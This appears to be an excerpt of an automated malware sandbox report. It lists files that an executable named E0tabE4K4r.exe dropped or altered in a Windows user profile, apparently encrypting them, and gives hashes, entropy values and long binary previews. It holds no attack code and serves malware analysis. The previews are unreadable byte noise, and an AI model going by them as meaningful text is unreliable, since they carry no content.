                                                                                                                                                  SHA-512:0CFB4A30392CB66C2EF67C747382299FD6691C55C631DA7726F38500266449ADE479041A72529C26A36AAC8E26B45D2F0DD5C9875523C5F474FB9F7631AB4C30
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:V.. .F"L.L.0%...w..Z.t-........X.%.{.}...$....Fm..wZ.x...X.....aZ.G.l....ew..%;..K..R...[ywg.U.gh..q5.g...BzSo=2.-...K.!?.z..-...gL.f....A6.-.hM..r[..)..t|.....^.,...6.o"v..%..3.]p..s.?..@..E....1G.,..Ue..e..d.........!R.......U...mL.?|./.0....;..Jn......2wA.a.qS....Q2.#.......3e.dnW.8..b.......k..=.S"f..+_).5..W...a...w>.W.n.WV.b......s.....5......mf.<..J..6.....J.M.)............r..L)./....o.........\.....I.Q..~..&...D...... X..]I)..<D.`.iP...~.nhR..df.O..7.......P$..Tp..,"6-...\.6e&^.....tm.~.*....U.Y_q...6...-.Z@s...4e.......{F....t....C+..............2...)..CtY.K.....L;...Y..s]r=......0..(v.........V.v1.X..I..[..8...rP.m.*...]i.'....x.......R....s&.B... va.=.d.....P$.i.......A..@Q..l_..h..).|sj).J?.)..an..L...:.k...{........qUjy...a.. ....@.......?..5.jO.....{!G.I.Rk...Pm.U.*.5;.f.H......."6...3.s.C..D...Tg..:..T2...)t..Z..Q.(...Jz.m....BP....g..S.S7.0]....Q...T&!..).Yi.JsA(.D.i.&...Y&A.R.-t.H.'.... ..o.",..if.$..".`.S.bP..k.Q..

                                                                                                                                                  C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jtx

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3146062
                                                                                                                                                  Entropy (8bit):1.7306362749544866
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6144:coPnM68zV/i6boa2ViFA+05f1fODI65azgkLDHA3igSbq2rwRDOAlVTtl1FtVs5D:c3LTFAxfO35akmD/X0l9sV
                                                                                                                                                  MD5:4ED8B0CCD3A1597DA413C11439CC92EB
                                                                                                                                                  SHA1:5312686DD79DF5F1FC69FA1D45A5F4B0265FBFD0
                                                                                                                                                  SHA-256:2B12BD5BCF63FF7600F15FF1AF9683D013C98B0AB4389925EF93EAB3E76B5510
                                                                                                                                                  SHA-512:7D5B75116D09F20CAB505772AAE6D98334E0B1AE9B5AF7DB10128922DABC1488043F5DE7693351B6F4568508AA2D3CE679AF3B046EBE7662BB037538DF6B96AB
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:R;.5..VI..QGs.HmA.AQ..2.@.Vr.o~...1..}.Ss.......(...../u>....G?............=mMT.OX.L.?.c..INl.mSs.<....7.M....).;....W...o...p\I]?.'... ..b...hC....MLd.............G L..............qP..R....b...q.X.H...o..W(...x..e.v.|...xG......T...........=|k..$HS..sw...D.i....w.7a.[....]{.Pwb.+....Bu......U........%.......m.;.A......:..R2:...<.R_....p.N...>.9...:I......e.....v....(4.d..g.I..#..#..h..(...+!..@.%%......1....^.Fp*-A\7....l....ng..t.....I+"...n\.......py:.....'.b+.K...}.~@...o._\...=.e.>...K]...Rh...b/-vl.T...:.H^v.ZG..P[.\..Jm.Mg..G....F5.......B<...:.2...tM-*...y.Q.......R././...>.n@..........8...E...o.F...V.jV..l3.|.4...t..%.5;]}.g...P7......g.+...!..e.$..V..%...-.-.w..!....S..\.EO..%..*.%.....3F.3NeH..s#l....6dG?{.j_mi...wny..D.}.&2..x..........Tp.:B...^i..h.}.Tn....@\.....vy'.C....iF..T....t.p..4.&......P.h_C...i..}..tV_.(.k..S.y.....[.K.@..u.@E....fN..1..c..2D(.\......;...V/s.........e.......L..cy.O..s.j..)5...%.....F`L...f#...E..

                                                                                                                                                  C:\Users\user\AppData\Local\Comms\UnistoreDB\USSres00001.jrs

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3146062
                                                                                                                                                  Entropy (8bit):0.67061798549968
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:0lg1un6TbHlfVa/RPlHIoK1i0jC5RgGrmCjsSItDmx7x:UHWhf0PIoNQQVrR+6x1
                                                                                                                                                  MD5:10032BD4B67F1900ECD1EA4E3D4EA75D
                                                                                                                                                  SHA1:0AB63EEADA8C6CC52643756309978B5588D142E3
                                                                                                                                                  SHA-256:B0357DE003207004FDB154FF531A64D424DF03D8A1E7C9749D29D7E17B31E29F
                                                                                                                                                  SHA-512:0AEAE7A6619CF0996594DF8337683C2A544C2E4A8257357AF23B32B3E450F56E2C8E9F97E1F82049B1FABF1540A96C6810269A01AA6CE3EB24EA27AEF85ADC9F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.......J..U-.v...bC..g......T.O.;.*5.%.g.(z.Z.v$./..S[8...r..R...k..P..F..l.t.l...,d...e....m9?.S..3.E...A..}...}.......w...h..-...}.[U.mO..sey~Xr.....jI..>.......^T.YH.X.............J.a..A....G....d..d&....f..W.x...#....q3/7k.A....nT....:..w...h...Q..,.~a].aM.....([......#.#..un`\x...B.m..m.EF:.....v...1yG...<lmO..e.......Bn....c.....E,.K.].YlD/..U..w.._..z..4LO4.~j..."ll.d.[.V./..sRz..F~...E.....m....%M3..~.`1Q.K.+..r..3...eK.[.>.p...."=.o....7......b.G.A..myd..]...T5.3=...X.Lu.!...R.....a.d......&E.e.x.!H./..-.F].;h.6r.."J]......~o.6..F.{...?2.R.&.'..:.E..k.....GB..p.1..P'.KV,.,...Au1...n..!...^..^....q.R.g...y.v..g....rh..@43_2..{*I......ikX..M........m8K.611.{..t..H].Wc.B.........C./.]w...g..1..u.g..C...Q41O....l...JN.9..<...&..q.]..........o`r.+]G..$~....'./0.c...p.M.."....w.cd.....;.m.6.....Zt.....0.%..Mlqy.......N.2.?X.',I.1b.../x5...M.5?:..8..O6..Zu.^zj..2.l/..80.xN..%.8&e..c....8...)x....`....5u...6..3lcf.g.W.......\.....W.4#P....

                                                                                                                                                  C:\Users\user\AppData\Local\Comms\UnistoreDB\USSres00002.jrs

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3146062
                                                                                                                                                  Entropy (8bit):0.6705366470405941
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:lN9xE1ld5NoUxr6slHffEI6sJvWek96KF7HyjK6aCWP7P++n+l7IX:lN9IlrNoU5nT9IeLM7HPRP7m+n+lEX
                                                                                                                                                  MD5:2459C9A063684F53566DE877A0682A09
                                                                                                                                                  SHA1:D17A75E5B3BB243A5987C876AA6213D1E61AFA04
                                                                                                                                                  SHA-256:61BF498078848961D0E817073C1ABA23275137752AD2AD8B42B3BBBB231F9874
                                                                                                                                                  SHA-512:DD698DB5B99DF9DFA810D44D45F0DA3F24C20F8CAB5AEEC7149CF0FD6E5890136999831FEE32B228B591438ADA2DE8F62752A72E8E7F48FF846862F9A909B19C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.........%......~9-.&|.WGF...../i.`"..l..'.fI...z~@..X.3`.v..]o......g..P..\.'..v.s..j.XJ.gY...s.\o<.?....n..........1<..H....O.\..q,bb.........8....u.~#.#oaq)..F.`........M.I.....9...X.C..~.u..<.H{6...M..-V..|..W...Vt..d.]...Q.&...v.kt..a.v.h9..{.l]...3Y....vc)...I!9..$r';.3..S.+.|}.O..:.O.X.w)..>..>..U]....f.c1...X...?).v#...6^.R.k..CL8.........Vt.M..5..Y.pd/...Y.k...}.....c...S..ML.1{..OQ=u..@c....x..Nw@b%|.|..%65...1..F../.....#.|R.o................$...A_.\..>..B.....@......a@@g.;.A.?.%eU.....V...x..P.".....=...1Y.........x..{.r.....Q.Q...."7...X${9..t...W8.bR....1Ss4.D..B.|..s.y....P.O....1....mPHY.nv..rdlz\...R..[...gI6.1....n[h.@.{..#}.m'.w.}8_.Y..p..LX..D..<.._..y...q........<j.....C,.-..T..l_...:.>.c...z.G.-e.}..|...@.3 3B.&......r.n.[....."....#d..".`...s.....0..s}z..U.W..c6...X....!._*..d^...Y..a..>..=...Clz...9.F..i*......&...\.....yc@.?'..ro..z.xA...}Q...N._.'..h..?..../W.@(]......A5}.bJ9..x-....y.3.QM.M.TS........-.(.&.

                                                                                                                                                  C:\Users\user\AppData\Local\Comms\UnistoreDB\USStmp.jtx

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3146062
                                                                                                                                                  Entropy (8bit):0.6705623675751299
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:OL4T4z49zT2dq+bvpZt+YPYTw0uZSKxyrth6HtSYa1f60e2:W4Tsdzbvp3+FTiS0Nna1iS
                                                                                                                                                  MD5:276BA4E75A1A504B12AC4872D7C94482
                                                                                                                                                  SHA1:679D449A707CF18096562AA5EBAD0D170FA01AEA
                                                                                                                                                  SHA-256:087D10F6FE7B2B0A991F7A3D1E546BC4539DA5276971B2BB68C32E2452C9ABEB
                                                                                                                                                  SHA-512:11D3A506956E6EB04F40EC4FB4C0E074DCB6DDAC814EA65BCECCE474B048CBF5DB7AC446448D3681B8FEC582E4DF02D6A68AF0F123917039862A96583F3D8E48
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:......V.{.MU.K,.#XK...f*..OF.{.Gd..z......y......8.D.VX.AN"..Cx"..&......T......-.../]D...s...p..V.]..k....D.i.yM....8.W.|.:..n....tH.r......ao..y:...2..d...$&...T_..R.......C...I.......\J...........H..B.D.{w..:...2.#_T..Y_.,.Z.|.X....6...[.wXF+C.6(~......:.u...,.{c...*....<Y4..A..+...}..{h.%.z.Z...N.J3..ivF.Q.D...fb.wZN/.P..S<nw.m!'(....d.. .wH:dQ....S.M.h.T.....k.(....._.U&..%. ]...?.R{`)...+Bc..W..'.....s....o.U.?.M..,;.........e]0....U~%!K.....Z.J.~Zau...N).5.u...H...O...&9#qL.k,...n!._Cv....{.Cd.Ly...1....".....E............j.o.G...:.e.:.3.r.....Y.Y?.q... ...S....H........7...?z...Q..p.bm....%V...z.[T..;.m....$....VF.Xz..*......ifh.Z.R.(v.v..@o7.'lEQs.RTs.5......@}A..i..obm.~].R.U3...b?t:.......|....M.6.=. s..Q..Y...PmC.%..B*.).JA L.i.....9WXc...-&.."9..bD.Q..n.B....K6S.!..s.=.jF.LoKK.9...N<.%P. .."j.".XB.s..%.CG,.I.e.Y...*S...#b.]Z...6*HJlG...}......&..<.t.1i.[...R.$InZ2..AK.D....mKE:}.g.ha)F:....^..1....Z......y._........Xs.I.8">H.....`d..

                                                                                                                                                  C:\Users\user\AppData\Local\Comms\UnistoreDB\store.jfm

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):16718
                                                                                                                                                  Entropy (8bit):7.98890728396996
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:RQhIPAOPkhzUpj1iCb7tGUdAYvUqhJh3LKPNifuAtWSxK9o7fXO8b1t/7NCUo:RQikhu5bIyAYsE/3LGNFA5K9oLe8b1g
                                                                                                                                                  MD5:7EA7A8210DEB612A1BC4818BB05CF5C2
                                                                                                                                                  SHA1:93DF35EAF8793AD7DC491822CA94AF452D738F49
                                                                                                                                                  SHA-256:8E20D8ABEE0B4054B10EAD6669F0EBCB477B5EDF1C276AD0CADC693FF671291C
                                                                                                                                                  SHA-512:BA0FAFE24F30D849D85D85B937D81331965313B00D37B04D869CA1A90595C09A25BDEE1591851DDC724DB4CCF546CF3F365A061A2866CCD64C41174CF28B6B47
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:..4(....$....._....d...=^.ql..=..$>yg..'......1.z...Pr.......95.*Q......~.D..?..0...U....;.q..B..<i'..-t...L..cY.)..!..T..}........O.....]....ozg*.....~..#.{.X..F.0.F..j)...k......H..#...u.(f.b..l/..mI.FF..Ps.8.?......q.b.v..;.G.^;.KKo.....^4.e..Q.l...o..h.......t...U.@.&"...ssy....d.e......O.....A(c.}.N.....&...VGT(.....g.(l...7Q.q.`Z.>,~%.%:`..e...S..,e.2.6|....."+.E....@..|..H4m.Q....%..`.*.iX.=..C..2.......c.;[.!.^.CW.Y.W.M^.f8......w.......U.u.)m^.Q.J.\..4.....LSL2..."..!....|.$.o#...8...'.yI.R^.u...B..b.O\.k..o].}...cP. .?o.....qM.t.XRm.K<....y.(....q..r.dH*0`.!c.....W=4....`6.).l)../E......y.;<Y. 5..~]k..0.q....|........o.E.....<.P^2b..s.p^..2..T.....7.r..QC..O6EK..._'EW...,...M.u..N.wd%.,O&b..q.../k.c......JS...6W..:......!@....q.L.~..-;.y= #L1....B...y.$....!WK.....}.....l5..$i...:..c.G*...rH!..}........../...1.:QR7..@N....Zv<. =...Z-XD..w.....I/.m.R. ..q...M....^o...Tv.....e. 7;%-.V.&.2S.<<..9...>.N.'.~7....S. s1#..X1....}|.. s.

                                                                                                                                                  C:\Users\user\AppData\Local\Comms\UnistoreDB\store.vol

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):6291790
                                                                                                                                                  Entropy (8bit):0.4528793361161117
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:5OVeGocStX7eNhpSw0ZIDBw9ENpQziAB0pUcRt6w/NZnn4CfYeWUfL:+xo/XKlSPZZuNp80KqTnn4CfYjUfL
                                                                                                                                                  MD5:40CBD81DD33399EF00D39ECD7F77400C
                                                                                                                                                  SHA1:1A21BAD13943025876FC8F966225768DE540E62C
                                                                                                                                                  SHA-256:FDC21CE1FD53C05DEB485F9847579481A4808722B0034FFC931AC4716F9FBF0D
                                                                                                                                                  SHA-512:D0B00373B641EFA24F04AA9794C3B67719C9B3094D19A5AD36B54ED7FCBD820BD7C7A98EDDE826E386CEB944E5B88383654E58164FE0DB2F84296F80A05E4D6C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:Nz...c.Izp}...l.3.Sh...S.G.....@/.@..S......L-9/....O.....6.&...)8..N.9E...eC.~M.foz.......NZ....N.M......%....B.5..6sR......(u..L."t..Hb..D..k.?..h.....l.r...b...W....2.W.C.G..(.M.9.VAX.../.MK...6.......fc........t..:.3..............wL.\. ..eU.....z_...l$m..B".#..[..R..;p..Q%.z,..?...[.e.....\0..2....G ......PS..L.&.V.aV.=F,...3K.1._...CS.o..8.u...Dv.N8;. .....;...CP...rG.#....?......O.M...<..zz.b.U.D..L.e...X........T......,E.....x^~.FB.++f.6.Z...f... .k.....C......B.q..uN.:_.fR.A;.....*h..o....P.A..!.T.P%a4=...9.1s..3Jps.^.........y......6.K.h.9.z..Hq.i.R..1M.%|>..bA.lm.....p.........z.;..Urf.B.....A7..5..i^.d.1..+....._R.<.`..hT..=<_k.$V.Yp...10.p....G.(.5s..s..7.c8..7./S.6..G]...!.-..aL)._....!..KY...(U.WY...Eg..y.)..*.k.Y.......u.7N...L.@7.G..}..t...C.p...u..w.2...8....A..pQr.b.o..".U.`...~E....?{s.h.&>...A........=\_..~>..Z.....2.|l.MIF[/..{*...q......Et....<.W8h.^.w1.-..If'.Q.j:I...R..s.8S..o..T...^...F...x....3...eA.c.4=

                                                                                                                                                  C:\Users\user\AppData\Local\D3DSCache\f4d41c5d09ae781\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):65886
                                                                                                                                                  Entropy (8bit):7.996947611430109
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:1536:/dJkxOuspk5VVEwd5X94K8TGlkDkzL5Ff8Lc8+4XdaXCN+i2W4ezS:/dJyT5VGZTGwkzLDf8Y8+cay0lxezS
                                                                                                                                                  MD5:22E4723A6928407F9677206E81CA9A91
                                                                                                                                                  SHA1:0BC3B625A2E05C3BF09AFCE11F700A8D8B5CA883
                                                                                                                                                  SHA-256:60CE4E8A96296FC269CFC96243AB288CF305A1274498AF3FA7C6F32927A8FB7B
                                                                                                                                                  SHA-512:3711700EA575FACFBA1EC04A3BEAA5E0139BD512EDD1B1028D2443410123A9C9C65A84F94181F705ABE25C6B7CC6706F4F9A67A46B2E318CFA5430F8917E64A9
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:...S.P..W..D..c.&.>... ..O.k..|.j.5L..2.......U.. ...."{?.M........O!@V.pR...W.~.....\FR.....~..=.$...{..X..!DM......).....:K.8.Q..%.t.m.....A;E....&...Y.06.fg...._.}.iaV....N.&EO3.. .....}.].Ff.g...p..u...VBr.a\r.,.,.)...9.jv..Xc....v...h4.<..?V..m.;.9%.Sj.............aEz.R.....e....:B."...F.{r.*......{..........(D..z.. ..@.6....<..e..5.....F?:..~)N../.p8..Xyuv.1Vr*...I..3...J^..ei..v..&..y\..C9;......j.X+o..Jlq..,..$.dc.-.z..G....." 6..k...9..u..G....>..D.a.....d.D.Q....Y.^..>.q=g......q..Bp[..hHJp....u......&}Ub.U.......jM..I........l..-.Q'........c.f>6.......I<..k.........W...-T...2~....x..W..{....W...l.^.c>...y. ..`.......:6...y.....~...u..g.O.b...........ZIM3yZ..2...{.`S..LA.<[..J\....=A.V!..U. .V....!.["~t.y...?.....g...0.......h....oDm.x..9..Q;Gi...!+'....=D.{-+J<..6+.....y.J..fp..>..Q.Fm.Y@..}..~i..\.WN5:/.!..,a.l&..nasve33h!R./......Y.O+tf......7Ox.Qj...T.......B@|.w..Y....w..n.......Ev..N..f.....`..R.s...d.G.Va..$)./.[.W

                                                                                                                                                  C:\Users\user\AppData\Local\D3DSCache\f4d41c5d09ae781\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):65536
                                                                                                                                                  Entropy (8bit):0.30272917135481187
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:Oztxn2blSWVgurEVGv3p8dfxp8RojLsTPqjxW0lKPDl/2bz:OpxCgurYGv0r8R7TP0EDlcz
                                                                                                                                                  MD5:F3F2AA44CF5B12D2452E364D855C4BA3
                                                                                                                                                  SHA1:73ED52F13DC8F0A14B30BCC47F568155ADD916E6
                                                                                                                                                  SHA-256:27CDEE739A7285B6FAA76B65C5C55F937353919047B5BF106090E61FD7719825
                                                                                                                                                  SHA-512:8B7F80BF991FF23A761A5ECD6DB598D19CE37C53634658E1A19913F77ADA732E1407D2238C33104F9CF58808C321F4530468EB8512D4A42E783357E6C2713422
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:......P.....W......isr]1S....|.....a.4....n......,k..{f....-. h:.......U.[.:..Z....yG.......4.{.Wv.I=.m.%J=f|}B.Ij.g......{..5.?=.>..1Vmab@.q.K.S....Ah.L..E0.C...I.....g.......m...0&.o.NE.32P/....cEZ..}.u_jXC...Uw......M/.'.d}<...i...U..xs+....M....{.E....6.'......"..*^..O6C..W.}./.R..Gqu.6.O2Tg....3k.c#...\.+..7..........V....B.VK..FW..6]Q.[U.N......rz..|'t..d..1D..2.Ar.*{.H......Z.%,3..$...r.... .{.aW3..].v....L...[".s.`.H^vt.....q+...y...y.....ha(.0.......R.i.f*....U.o..\..8...N.....\.:.h*.CSI.9...`...x&.1.8w.}......'.....s......9..8.......5A.8.....V..@c..T..;(......?`!a...."[.(....PSP#t...x.R.n.[..&Ph...Y}#..P....q.b........4.....Xy....g.a9.;\'..f....Q._.|].......e{W....g.....A.....w......K[A..bl....!..$|..7>.i...o...?.sE.gP.3o.q.C.\...z.@6.wLV93....+"B;V.E.A..n.P....m4^...B...a....E.nu../.`.w........X.6F...f...2k....>..V.}..0.Xr.H....h...G.OpYN$.&..g5...R..>q.....|..w..0 .....S."-..... '.*.c...3....q.+..k.".W...u.N}.q.+.1..k...

                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\000003.log

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):467
                                                                                                                                                  Entropy (8bit):7.46766854415075
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:q/9OKr+GQx4LWdLEfQ4kSThepmlfzwZDdSUdNcii9a:QrhyLEjk8fWDQ2bD
                                                                                                                                                  MD5:72EB0C0C876C22043022E656039AE0F2
                                                                                                                                                  SHA1:0A75494D5378802879694BA0E21A3A0AF6135700
                                                                                                                                                  SHA-256:9F774525080248299D7BAEBCCE627FC1A5C6A7162E568B7DC0D2480B60FAB494
                                                                                                                                                  SHA-512:485BFFDC8DD1910AC63DEC066C968CD39BE9C1990859F992E05FE7AC6C932D57AA4AC961CA305A3436793BEB89499FCD55521D52FA63683FB7678878FEAD3F8F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.f.5......3..X.C/`.@E...kq@\i\JQ....`.W.w....g$..'..T.....3..0e3.w....z..2.......~V4W.Ho....'p...*c...U.T.~*X..G..(..CX..j-..t......Ce3.!...IS(.}#..e.t{.....P.^...c:Vl.Uo<=5..0of5$..8^..Q.?..m........E^0.....A..5..Ku.t..4..4..Q..v.UKZ...R.J'.x.......L.R.....o...q.R....h.........(".......|..-.%.|c..=bg.T.N.e$U!.o|.._.N...US...1b.....3...O....u>Og...<^.VT|...aDwO'cK.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOG.old

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):613
                                                                                                                                                  Entropy (8bit):7.61620578665514
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:k6/0qccl7d64SMrMDm07+I1UjYYFZ+y/Ng9ATcT2YKJ4KdgkM6YCXIt1jtoc+kVg:D/zccl56c6m06NjYYiyF4ATcTy4Kddis
                                                                                                                                                  MD5:B97949B364774FEDE7BF376C261124F0
                                                                                                                                                  SHA1:B3CAEA3F1AA326BABAF09CB0C4A71CDDBE93CBF2
                                                                                                                                                  SHA-256:31722BB2EC40A92C1ACA5388F264D0546AE41B180EF68CABA8423D8845BE4EAB
                                                                                                                                                  SHA-512:F56B90E8F0338C63E9D4984E60AEC434BDBC6C3EC113363C2213E11ACB478139125007395012C16B6DEE04E4F97E58405FC7C8678E3EE2FC2E1ED9D54AE337BF
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:2023/.%2.....a./..F........@z+o..t..JqX3P.....k.@......q.*;..|..f.._]H..Uj7Ty.~...d.)...0j......4.S.'...4.P@Q.8.&.4M.yq.....l.>..b...q.v..(..[W}0.q...X.z.....7..yB..n.*/:f9.6w{(o..Q.d.'E...^j...J}._y..cB..v.mF.ih....qq..._.F..6...,}#......:.*:...K....fm.i.K:..<..*..m...o..M..n.R.i..7...F..N.1...XEN.y..}.t<..Y.....g...SO}.B/.h...F..hW...}.a......+......d..g..8#.R.d....L ...J...bd.1..G.=..y.h.N..k/...#.T...C..d..2.K+..G=..9..+<....5.Aa...CT{.#....$.G.....A.7.Jigu....t|...r.-,...1c...4...Y(*....Y...x:mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\000003.log

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):467
                                                                                                                                                  Entropy (8bit):7.552838645886971
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:qAi+VCqvQHZgW/8O203XlKm4QcZa5YW5SUdNcii9a:Ri+VSHZg48OF31l4jZa/M2bD
                                                                                                                                                  MD5:490915F506A1FC8836577BCD1A6D676C
                                                                                                                                                  SHA1:062A246D9D38A83C7C6B50E261DCC976B3223483
                                                                                                                                                  SHA-256:B1419CEC3386E1548AB238E5DCA414224AC03F11471D3B68C4AF03A49BC8F15D
                                                                                                                                                  SHA-512:A2650CA470D2699A886EE28BF2CE88617E31CF3E3373B9242A35D2F63BDF747DC5CFB89C68D87CC5AD9D0BE9552C385F6A548501C2D60AC056C0553AAA6A764D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.f.5..vK..H4.....T.J....Z.[..0`...,.z.^......$..>gO.u.;EV...*.S.v.g.7."...8>N....k.a.H.^..~].p[e8..........F.N#.`..n.TJ.S/.fD.P6.....o..|.e......].`.z5.X.a......{..:.$x~6...c..../.;.M...2....ps.../....;.I....(.k......h........ylb.cP....mHd....+#....._G-..?C\..9.8M.F....N..{..d......|.!.i....s.....iY.b...J.Zn....e.f....v...\H.A.I&c............'..E..Q.....UIQ...z. .v:PmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\LOG.old

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):617
                                                                                                                                                  Entropy (8bit):7.592697732726993
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:k8XFMvtorTg1fE1Rako1HPfiKRCXXgG0QLnuSrSuRo2SUdNcii9a:QtoYO1Ra51Hn9sngGbLnpdO12bD
                                                                                                                                                  MD5:CF02CA14F77C7CE3AFC2A0DDDC4A4472
                                                                                                                                                  SHA1:EFAE913C3C1D9A9442F3A136FC9CD17A899F4B1E
                                                                                                                                                  SHA-256:512183DFAB82FB34B9B9250AACAC1AFA1B96EB5903954D55AAB30940FA4F4FDE
                                                                                                                                                  SHA-512:7E18BA1638CA01EAA8F7268D995E8EC441DD53772DA9909B18F8DD4428AE2F55348880360B865A21D7C618914595B55F69A85FF80ACA524052500EAD4BD4BD62
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:2023/t.t.OQpE...._.}.@;..r.r.O.w.Zy....d...(.-..n...S.I'.S4H.p..L.tgt.6y.........G............b".-E..X.. ....s'.....X...d].|......)H....ej....U...^u.sy..B.......#X..z...|..e...&.[.+s..w....u7.........#E#=."".X....."..B.^.c.+:..<DQ.Xv....+.*..z.Q.7~C.......r..a.z..~U.&.!....r..=..S.*s'..1..D.~.<.....0v+.!...l4.y..Eo.gz..]..Di...EZ...~f..%oX...0.y.....}.s...8......J.9.-..L)...q.......Ri....C.O..d...t....[..X..1.......?..E.rSM.t.....h.U..KS!7Il.Kn>.L....Dv.m...f.fRq.\.V....~.>A..E..WZ.>\..70.Q..(.8]....|Z....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\000003.log

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):733
                                                                                                                                                  Entropy (8bit):7.720356372366589
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:qB44bPwnNz6KU3zg0jbz37JKYyAf6aYyDe3jtRVGIcIAMhgsiU1M/Z7FSUdNciik:gINHU3zgqn3oMYyDe3hRVVrATPST2bD
                                                                                                                                                  MD5:F8157D7ABE0CCEAE051A930583555D1C
                                                                                                                                                  SHA1:B618FB4D5FA5740CFF6D156C83151EF2A4BD2103
                                                                                                                                                  SHA-256:91611C881CB8E971E3E74D04A8041173CF0092EBEA57209FCA6426FA7AB306A3
                                                                                                                                                  SHA-512:5B1B8AC3E8EE1BCA96B47BDDA3E9F9B4A41E5025FFA4EA19BCE41F234DDC58512E0BE298EE56B1FD6AE33DDD4DEB276EE1D436AB3C5CA639E1F02947A74A9D58
                                                                                                                                                  Malicious:false
